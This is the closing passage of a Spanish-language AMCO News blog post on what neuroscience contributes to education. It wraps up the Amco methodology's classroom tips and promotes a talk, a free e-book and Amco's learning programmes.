Estas son algunas de las influencias que la Neurociencia puede ejercer en las aulas y que se tienen en cuenta en la metodología Amco. La investigación sugiere que ésta es una conexión positiva que puede beneficiar al sistema educativo, pero también a la sociedad en general.

¡Ya puedes empezar a utilizar estas 5 claves basadas en lo que nos aporta la neurociencia para enriquecer tu aula y que el aprendizaje sea mayor, mejor y más efectivo!

Y por si aún tienes ganas de profundizar más, por aquí te dejamos una charla en la que participa Chema Lázaro y docentes de centros referentes de la Comunidad educativa relacionada con este tema:

Y, además, un e-book totalmente gratuito donde encontrarás información para aplicar metodologías activas a tu aula. ¿Lo quieres? Sólo tienes que hacer clic en la imagen de abajo.

Si quieres saber más sobre Amco o nuestros programas de aprendizaje haz clic aquí y nos pondremos en contacto contigo.

La entrada ¿Qué aporta la neurociencia a la educación? se publicó primero en AMCO News.

]]>